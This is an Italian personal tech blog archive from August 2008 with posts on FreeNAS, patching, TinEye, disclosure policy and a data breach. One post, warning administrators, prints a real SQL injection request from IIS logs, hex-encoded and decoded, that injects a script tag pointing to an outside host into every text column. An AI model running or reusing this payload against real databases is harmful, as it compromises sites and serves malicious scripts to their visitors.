Entries from Agosto 2008 ↓

C’è qualcosa di strano quando:

• pur non essendo straccioni, si mettono nella valigia più alimentatori che ricambi di biancheria intima;
• pur essendo amanti della lettura, si porta con sé un solo libro di carta (Singularity Sky, per la cronaca) e 1 Gb di memorie SD cariche di eBook;
• assieme alla fotocamera digitale si porta la capacità di memorizzazione di massa che pochi anni prima era riservata ai dischi rigidi dei PC di fascia alta.

Il cyberpunk è qui tra noi.

Arrivederci tra una settimana, quando caricherò qualche foto sul mio account di Flickr.

Dimensions è uno spettacolare film divulgativo di circa due ore dedicato alle dimensioni geometriche e alla quarta dimensione in particolare.

Le immagini del film sono spettacolari per chi ama questo genere di trattazioni. Immaginare un simplex 4D, un ipercubo o figure regolari più complesse a quattro dimensioni non è semplice, tuttavia la chiarezza delle spiegazioni e l’ausilio della grafica portano l’appassionato quanto più vicino possibile ad una buona comprensione dei solidi a quattro dimensioni.

L’approccio è decisamente divulgativo, il ritmo della narrazione è deliberatamente lento senza essere noioso per consentire allo spettatore di assimilare i concetti attraverso le animazioni.

Il documentario si apre con i concetti base di coordinate su una sfera per poi estendere il concetto alla proiezione stereografica, fondamentale per la comprensione dei solidi a 4D. La narrazione prosegue con l’utilizzo della proiezione stereografica per rappresentare oggetti 3D familiari per poi passare agli oggetti a quattro dimensioni, utilizzando una notevole quantità di esempi.

Fino a questo punto il documentario dovrebbe essere fruibile anche a persone con una conoscenza da scuola media inferiore, i capitoli successivi necessitano almeno della conoscenza dell’analisi matematica di base. Dimensions compie, infatti, un excursus nei numeri complessi e nella rappresentazione grafica degli insiemi di Julia e di Mandelbrot con immagini spettacolari (altro che FRACTINT nei primi anni ‘90!).

I capitoli successivi spiegano l’utilizzo fibrazione per rappresentare in tre dimensioni la rotazione di tori e sfere quadridimensionali: la visualizzazione della proiezione 3D della rotazione di un toro 4D che provoca il rovesciamento del toro come un guanto mi ha colpito non poco. Questi sono due capitoli abbastanza tosti.

L’ultimo capitolo è fruibile da tutti e spiega in maniera semplice come si può provare un teorema geometrico e la differenza tra teorema ed assioma.

Dimensions regala due ore di sense of wonder a quattro dimensioni, una sensazione non comune.

FreeNAS è un software gratuito per creare un NAS utilizzando del normale hardware PC e, ovviamente, dei dischi.

Ci sono molti NAS pronti all’uso con vari prezzi e varie caratteristiche e moltissimi utilizzano un Linux personalizzato come software di gestione. I Buffalo sono NAS molto buoni, ma non esattamente a buon mercato; di contro i Linksys mi hanno deluso per le loro basse performance, specialmente in caso di ricostruzione del RAID dopo uno spegnimento accidentale.

Può capitare di dover dismettere un server o un PC con un case ben carrozzato ancora in perfetto funzionamento. In questo caso, si possono aggiungere altri dischi o si possono sostituire quelli presenti e si può installare FreeNAS. Come si vede in questa scheda, i requisiti minimi per far funzionare FreeNAS sono davvero minimi ed è, quindi, possibile riciclare senza problemi un PC o un server in dismissione.

Il software si installa in pochissimo tempo; la configurazione del NAS può essere salvata su un floppy, su una chiavetta USB o su un disco, FreeNAS lascia ampio spazio di scelta. Una volta configurata l’interfaccia di rete, l’interazione con FreeNAS avviene tramite il browser e si può staccare la tastiera dal PC, posto di aver configurato il BIOS per non bloccarsi in caso di assenza della tastiera.

Nell’interfaccia web si aggiungono i dischi alla gestione del NAS, li si organizza nel RAID desiderato e li si pubblica in rete. La parte di pubblicazione è quella che mi colpisce favorevolmente, in quanto sono disponibili moltissimi protocolli di condivisione dati.

La qualità del software è decisamente elevata e non ha nulla da invidiare ai software dei NAS commerciali; non ho ancora visto un NAS commerciale che disponga di tutti i protocolli di FreeNAS. Con i costi attuali degli hard disk in costante calo è facile approntre un NAS spendendo veramente poco; la versatilità di FreeBSD permette, inoltre, di utilizzare un’ampia varietà di hardware senza problemi.

Vale la pena investire qualche ora per fare delle prove e per prendere confidenza con quiesto prezioso software.

Piccolo spazio pubblicità.

In agosto ho aggiornato il motore di HyperTrek, che ora è alla versione 2.0. La novità più evidente è il cambio della grafica standard: ho voluto un po’ decostruire l’interfaccia e togliere filetti, sfondi, retini e ammennicoli vari, vuoi perché oramai ce ne sono troppi nei siti, vuoi perché spero che una grafica così leggera sia più fruibile dai dispositivi portatili. La nuova grafica è figlia dell’uso massiccio di DIV e SPAN al posto delle tabelle, che sono state ridotte al minimo indispensabile. Le immagini della nuova grafica sono opera del vulcanico Sat’Rain, impagabile collaboratore del sito. Questa scelta mette a disagio chi usa ancora Internet Explorer 6, ma spero che gli utenti di questo browser pieno di vulnerabilità note a tutto il mondo aggiornino velocemente il loro programma.

L’altra novità è l’introduzione delle skin, ovvero la possibilità di cambiare aspetto dell’interfaccia in tempo reale. Sat’Rain ha disegnato a tempo di record una skin per i nostalgici conservatori amanti della vecchia grafica del sito. e probabilmente altre sono in arrivo. Rimanete sintonizzati.

La pagina delle news è finita nel riciclatore dei byte perché non ricade negli scopi di HyperTrek quello di fornire notizie dell’ultim’ora. Al suo posto ho creato un aggregatore di notizie che controlla ogni ora vari feed RSS dedicati a Star Trek e riporta le ultime notizie sulla pagina principale del sito. Questa soluzione asincrona (il task che scarica e analizza i feed RSS non è quello che visualizza le pagine) permette di eliminare la noiosa attesa che si aveva con la versione precedente quando la pagina di apertura del sito era rallentata dal caricamento delle notizie di altri siti.

Noterete anche che è sparito il parametro ndx dall’URL delle pagine del sito. Nella nuova versione l’indice da visualizzare viene gestito attraverso una sessione PHP. Questo permette di uniformare i link anche a favore dei motori di ricerca. Sempre in tema di uniformità, tutti i link che hanno come destinazione hypertrek.org vengono rediretti su hypertrek.info.

Windows Update, yum, WSUS… Il dilemma colpisce sempre il SysAdmin: aggiornare o non aggiornare?

Se non aggiorniamo, non introduciamo nuove variabili incognite nel sistema e continuiamo alla via così, navigando le acque sicure che nascondono però scogli molto insidiosi. Se aggiorniamo, rischiamo di trovarci davanti ad un sistema inattivo al primo reboot.

Va puntualizzato che il buon SysAdmin deve saper affrontare un disaster recovery senza problemi, quindi in caso di errori fatali conseguenti gli aggiornamenti si deve poter tornare alla situazione precedente senza traumi. Se poi stiamo utilizzando vmWare, il tutto si risolve in un paio di click e un reboot della macchina virtuale.

Certo, Redmond non ha una storia di aggiornamenti senza problemi, basti pensare ai service pack pari di Windows 2000 Server, alle conseguenze del Service Pack 2 di XP. Più fortunati sono i SysAdmin Linux (non quelli conservatori che utilizzano ostentatamente sistemi legacy) che possono contare su una maggior apertura delle informazioni.

È indubbio che una macchina non aggiornata collegata in LAN o a Internet sia un rischio non solamente per la macchina stessa, ma anche per tutta la rete, in quanto rappresenta un punto debole della catena. Moltissime macchine ridotte a zombie (ovvero controllate da malintenzionati per distribuire spam o attacchi informatici) subiscono questo triste destino perché non vengono aggiornate, con tanti ringraziamenti da parte dei malfattori. Va inoltre rilevato che molti attacchi (distribuiti o mirati) vanno a buon fine perché il SysAdmin ha avuto paura (o non ha avuto voglia) ad applicare un determinato aggiornamento, credendo erroneamente di trovarsi al sicuro.

Da quel che posso vedere, Microsft SQL Server e Exchange Server sono i software tendenzialmente meno aggiornati vuoi perché le procedure di disaster recovery di quei programmi sono assurdamente lunghe e inutilmente macchinose (grazie, Redmond!), vuoi perché gli aggiornamenti richiedono che il servizio venga disattivato e ultimamente sembra che anche la più piccola delle organizzazioni non riesca («possa» nel linguaggio della Terra degli Utenti) a stare senza posta elettronica per un paio d’ore. Lato client, invece, noto che moltissimi utenti (o SysAdmin) scelgono ti tenere Internet Explorer 6 e non passare alla versione successiva. In questo caso, ogni PC ha una serie di vunerabilità note a tutto il mondo, a cominciare dai malfattori: la zombizzazione di quei PC è solamente questione di tempo.

Quella di non aggiornare, a mio modesto modo di vedere, è una scelta miope che nel breve periodo aumenta la disponibilità apparente del servizio, ma nel medio-lungo periodo riduce notevolmente la stabilità del sistema e incrementa il rischio di fermi macchina prolungati e imprevisti causati da attacchi o da blocchi risolti da aggiornamenti usciti qualche mese prima.

L’aggiornamento va visto come il tagliando dell’automobile, consigliato dal buon senso e dal costruttore, la cui implementazione è lasciata alla discrezione e alla responsabilità dell’autista: probabilmente è una rottura restare per mezza giornata senza automobile, ma almeno sappiamo di poter affrontare la strada con il minimo delle probabilità di guasti.

TinEye è un altro motore di ricerca, ma questa volta dedicato alle immagini.

A differenza di Google, Flickr o altri siti che si basano essenzialmente sui tag, sui titoli e sul contesto testuale della pagina in cui si trovano, TinEye dice di essere in grado di trovare un’immagine simile a quella che viene fornita come esempio.

La pagina principale del sito dice che le funzioni di ricerca sono in private beta, tuttavia in un articolo del blog di TinEye viene pubblicato il link per potersi iscrivere al servizio. L’iscrizione richiede veramente pochi dati e l’accesso al servizio di TinEye è subordinato ad una conferma di ricezione della mail.

Una volta fornite le credenziali, si può iniziare ad utilizzare il motore. Vale la pena di dare un’occhiata al link Cool Searches in cui vengomo mostrati i risultati di alcune ricerche, tra cui la famosa foto dell’uomo nel soundstage sulla Luna (Paolo…).

Un aspetto positivo è la possibilità di installare un plugin per il browser per poter cercare un’immagine su TinEye semplicemente con il click destro (o equivalente dell’interfaccia) sull’immagine.

Il database di immagini, come loro stessi ammettono, è ridotto ed in crescita. Tant’è che la ricerca del loro stesso logo non produce alcun risultato (nota per TinEye: indicizzate il vostro sito!).

Lascio ai miei due lettori il divertimento di registrarsi, di provare e di sperimentare se anche per questo motore vale la Regola 34.

Noto con piacere che il panorama dei motori di ricerca è di nuovo in fermento, anche se non si può dire se queste novità siano destinate a durare o siano delle comete, ma apprezzo l’esistenza di una pavida concorrenza, anche settoriale come TinEye.

Aggiunta: Idée Inc. deve avere qualcosa a che fare con Amazon perché se cerco delle copertine di libri americani viene sempre segnalato un link di Amazon e l’IP da cui proviene il bot che scarica le immagini quando si fa click destro utilizzando il plugin è il 72.44.37.70 che appartiene al blocco 72.44.32.0/19 di proprietà di Amazon.com. In effetti, Amazon avrebbe i numeri per poter entrare in questo mercato.

Trusted source riporta la notizia di un nuovo attacco a Microsoft SQL Server.

L’attacco sarebbe partito la scorsa settimana e avrebbe già interessato migliaia di siti.

Se spulciate i log del vostro IIS potreste trovare una riga di questo tipo:

GET /?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520
4054207661726368617228323535292C4043207661726368617228343030302920
4445434C415245205461626C655F437572736F7220435552534F5220464F522073
656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563
747320612C737973636F6C756D6E73206220776865726520612E69643D622E6964
20616E6420612E78747970653D27752720616E642028622E78747970653D393920
6F7220622E78747970653D3335206F7220622E78747970653D323331206F722062
2E78747970653D31363729204F50454E205461626C655F437572736F7220464554
4348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040
542C4043205748494C4528404046455443485F5354415455533D30292042454749
4E20657865632827757064617465205B272B40542B275D20736574205B272B4043
2B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420
7372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F77
2E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27
206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372
633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A
73223E3C2F7363726970743E3C212D2D272727294645544348204E455854204652
4F4D20205461626C655F437572736F7220494E544F2040542C404320454E442043
4C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C
655F437572736F72%20AS%20CHAR(4000));EXEC(@S);HTTP/1.1

Che altro non è che la codifica esadecimale di questa procedura SQL (senza i link ai siti che ospitano gli script):

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+””>
</title><script src=”http://sdo.1000mg.cn/csrss/w.js”></script>
<!–” where ‘+@C+’ not like ”%”></title>
<script src=”http://sdo.1000mg.cn/csrss/w.js”></script><!–”’)
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

La sequenza SQL è abbastanza offuscata e, comunque, non è presente la parte di JavaScript che completa l’attacco l’URL del JavaScript non è più raggiungibile. Lo scopo dell’attaccante è di inserire nelle pagine visualizzate da un sito ritenuto affidabile del codice HTML che linka pagine di phishing o comunque di dubbia legalità. L’efficacia dell’attacco è aumentata dall’implicita fiducia che molti utenti hanno dei siti compromessi da questo attacco che stanno visitando.

Microsfot SQL Server è utilizzato da molte organizzazioni governative e da siti ritenuti affidabili dagli utenti; pertanto è bene aumentare il livello di attenzione anche quando si visitano certi siti ritenuti affidabili.

Un sistema per sapere senza fatica il tipo di server che state contattando è l’estensione di Firefox Server Spy.

In questo momento l’attacco è ancora in atto e ci sono molti siti compromessi, quindi prestate attenzione.

Si dice che ogni programma non banale contenga almeno una variabile, una struttura di controllo e un baco. Si dice anche che per i programmi prodotti da una ben nota software house questa affermazione sia più vera che per altre software house.

Nei tempi eroici del Clipper ero membro di un gruppo di sviluppatori che lavorava per un progetto per la pubblica amministrazione. Lo sviluppatore leader del gruppo, da cui ho imparato moltissime cose, aveva creato anche una fantastica routine di gestione degli errori, molto informativa e utile per il programmatore che mostrava una bella schermata rossa con caratteri gialli al manifestarsi dell’errore. Questa funzione manda in visibilio lo sviluppatore perché si accorge all’istante dell’errore anche se è lontano dallo schermo e presenta a schermo una reportistica dettagliata. Tutto bene, finché l’applicativo non entra in contatto con quella particolare zona del Mondo degli Utenti nota come Anteprima Per Il Committente. Murphy, sempre all’erta, ci mette lo zampino e si manifesta un bug durante la demo. Fortunatamente la cosa si risolve con un’abile prestidigitazione sulla tastiera (il Committente manco si accorge di cosa sia successo), ma ci insegna una cosa: gli errori fatali non devono annunciare a oves, boves et universa pecora il fatto che ci sia un baco nel nostro software. Mai.

Peggio ancora quando la grafica della schermata di errore diventa nota tanto quanto il brand del software in oggetto. Ulteriormente peggio quando questa schermata è visibile nel momento culminante della cerimonia di apertura delle Olimpiadi.

Gli errori fatali (o exception, o abend o il nome scelto dalla piattaforma che preferite) non sono mai semplici da gestire perché sono situazioni in cui il processore e/o il sistema operativo si trovano in una condizione tale per cui è impossibile continuare e l’unica soluzione consiste nel riportare la macchina ad uno stato noto (reset, per gli amici). In queste situazioni il sistema operativo non si può permettere molti lussi, quindi bisogna eliminare ogni fronzolo, informare l’utente e dirgli con belle parole «Devi spegnere e riaccendere perché è successo un grosso casino. Ah! Se non hai salvato, hai perso quel che stavi facendo».

La chiosa di questo sproloquio è quindi: possibile che Redmond in 14 anni di commercializzazione del kernel di NT (e discendenti) non abbia pensato a qualcosa di meno riconoscibile per le schermate di errore fatale?

Aggiornamento 25/Set/2008: Technologizer ha pubblicato un articolo sui 13 più famosi messaggi di errore dei computer: vale la pena dare un’occhiata.

Ficcatevelo in testa: nascondere (o negare) i problemi di un sistema è il peggiore dei comportamenti possibili.

La considerazione nasce, ovviamente, dalla paradossale storia che ha coinvolto alcuni studenti del MIT e un servizio di trasporti pubblici del Massachussetts. Innanzi tutto va chiarito che le persone coinvolte non sono un manipolo di malviventi, ma studenti del MIT il cui professore è Ron Rivest, la ‘R’ del RSA. Gli studenti hanno scoperto un problema nel sistema di tariffazione dei trasporti pubblici e hanno applicato le procedure descritte dalla Full Disclosure Policy (RFPolicy) v2.0. La policy prevede che chi scopre un problema di un sistema contatti per prima cosa l’autore/gestore del sistema con cui stabilisce un dialogo che ha come scopo primario la soluzione del problema.

Questa volta, anziché dar retta ai tecnici è stata prestata attenzione ai legali, i quali sono riusciti sì ad impedire che venissero rivelati gli estremi della vulnerabilità, ma non a risolvere il problema. Intendiamoci: come sono riusciti gli studenti del MIT potrebbe arrivarci chiunque altro e questa volta potrebbe non essere ispirato da nobili sentimenti. Oppure potrebbe essere che già in questo momento qualcuno stia utilizzando da tempo le falle del sistema per viaggiare gratuitamente e questo qualcuno ha ringraziato l’ufficio legale che ha bloccato gli studenti del MIT.

Se qualcuno, quindi, scopre un problema nei nostri sistemi e applica la RFPolicy, non dobbiamo rispondere con una granaiuola di cause, ma dobbiamo ringraziarlo e, magari, invitarlo a collaborare per sistemare il problema. Una volta sistemato il problema, bisogna renderlo pubblico sia per invogliare chi è coinvolto ad aggiornare il proprio sistema, sia per evitare che altri facciano la medesima scoperta e la utilizzino per scopi non proprio legali.

L’adesione alla RFPolicy da parte di una Società è sempre un comportamento coraggioso perché alcuni presunti responsabili delle PR pensano alla caduta di immagine nell’immediato e non vedono le conseguenze per l’intera Società (non solamente per la sua immagine) a lunga scadenza.

In cauda venenum: il fatto che vengano denunciate pochissime frodi informatiche al sistema bancario dipende dalla robustezza della loro infrastuttura informatica?

Aggiunta: La presentazione è stata pubblicata e vale la pena di essere consultata da qualsiasi persona che abbia a che fare con la sicurezza informatica, non solamente riguardo ai trasporti pubblici.

La CBS riporta (via Slashdot) che all’aeroporto di San Francisco il 26 luglio u.s. è stato rubato un computer portatile che contiene le informazioni personali di 33.000 clienti di Clear, un servizio che consente a chi paga 100$/anno di seguire una procedura più rapida durante le operazioni di controllo di sicurezza negli aeroporti americani.

A parte l’idiozia di far pagare un quid per evitare i controlli di sicurezza, le informazioni personali contenute nel computer non erano protette da alcun sistema di crittografia, perciò chi ha in mano in questo momento il portatile ha libero accesso ai dati personali e agli estremi dei documenti di identità di 33.000 cittadini americani, molti dei quali, è ragionevole presumere, sono utenti abituali del servizio aereo.

Facendo un rapido calcolo, quei 33.000 clienti hanno generato un fatturato di oltre 3.000.000$ (ipotizziamo che alcuni siano dati di test, o dipendenti, oppure omaggi): è mai possibile che un’organizzazione con un simile fatturato annuo non si sia mai posta il problema della sicurezza? In una pagina apposita del sito, Clear dichiara che «in June, 2007, Ernst & Young LLP concluded a comprehensive, independent audit of our privacy policies and practices», evidentemente l’audit non era così approfondito.

A mio modo di vedere, stando ai dati pubblicati, il problema in questo caso è duplice.

Da un lato c’è un’organizzazione che non è in grado di tutelare i dati che le vengono consegnati. La nostra legge prevede non per nulla una serie di norme da rispettare in questo settore, molte delle quali sono pensate per far capire a chi sta gestendo i dati l’importanza di ciò che ha in mano. È fuor di dubbio che ci sia stata della leggerezza nell’affrontare questo problema.

Dall’altro lato abbiamo il personale che, probabilmente, non è stato sufficientemente addestrato o reso consapevole dei rischi che comporta la sottrazione di un computer con quei dati. Spesso chi commette leggerezze in questo settore lo fa perché nessuno gli ha mai spiegato quanto possano valere i dati che sta trattando per persone con finalità poco legali.

Concludo con una riflessione per i miei tre lettori. Pensate alle chiavette USB e ai dischi rigidi tascabili che vi portate dietro. Pensate alle conseguenze di un furto di quegli oggetti e ricordatevi che il mondo è piccolo, molto piccolo…